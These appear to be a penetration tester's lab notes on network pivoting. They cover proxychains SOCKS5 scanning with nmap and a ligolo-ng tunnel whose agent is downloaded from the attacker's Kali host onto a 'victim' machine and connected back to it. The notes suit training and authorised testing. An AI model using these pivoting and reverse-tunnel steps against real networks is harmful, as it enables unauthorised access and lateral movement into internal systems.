# Proxychains - setup SOCK5 proxy and leverage `proxychains4` - Ensure `socks5 127.0.0.1 9050` appears in `/etc/proxychains4.conf` ![[images/Pasted image 20251015091753.png]] - Add `dmz01` to `/etc/hosts`![[images/Pasted image 20251015091825.png]] - start ssh sock5 proxy![[images/Pasted image 20251015091900.png]] # Internal Recon - attempt nmap scans of internal hosts - all tops ports are filtered![[images/Pasted image 20251015092007.png]] - attempt some nxc scans ![[images/Pasted image 20251015094522.png]]![[images/Pasted image 20251015094536.png]] - `nmap` via `proxychains4` requires the `-sT` flag for TCP full connect 3-way handshake ```bash proxychain4 -q nmap -sT -Pn <target_ip> -F -T5 ``` # Ligolo-ng (alt pivot method) ## Kali host - download proxy on kali host![[images/Pasted image 20251014194729.png]] - decompress proxy![[images/Pasted image 20251014194754.png]] - give proxy 777 perms![[images/Pasted image 20251015152815.png]] - start proxy with `-selfcert` flag![[images/Pasted image 20251014194836.png]] ```bash sudo ./proxy -selfcert ``` - once agent joins we should see the following ![[images/Pasted image 20251014195357.png]] ### Autoroute - target a session with `session`, them `autoroute` to create and configure interface+route, start tunnel - new interface name `specialraptor` is created ![[images/Pasted image 20251015153718.png]] - confirm with `ip a` ![[images/Pasted image 20251015153626.png]] - confirm with `ip route list` ![[images/Pasted image 20251015153640.png]] - enter all subsequent commands with `sudo` ### Manual routing ```bash sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ip a #confirm new interface sudo ip route add 192.168.0.0/24 dev ligolo ip route list #confirm existence of new route ``` - connect to session and type `start` ## Victim Pivot Point - host agent file from Kali - `python3 http.server` from location of proxy file![[images/Pasted image 20251014201116.png]] - download agent ![[images/Pasted image 20251014194939.png]] - give agent 777 perms ![[images/Pasted image 20251015152945.png]] - connect agent to proxy server ![[images/Pasted image 20251014195335.png]] ```bash ./agent -connect <kali_host_ip>:11601 -ignore-cert ```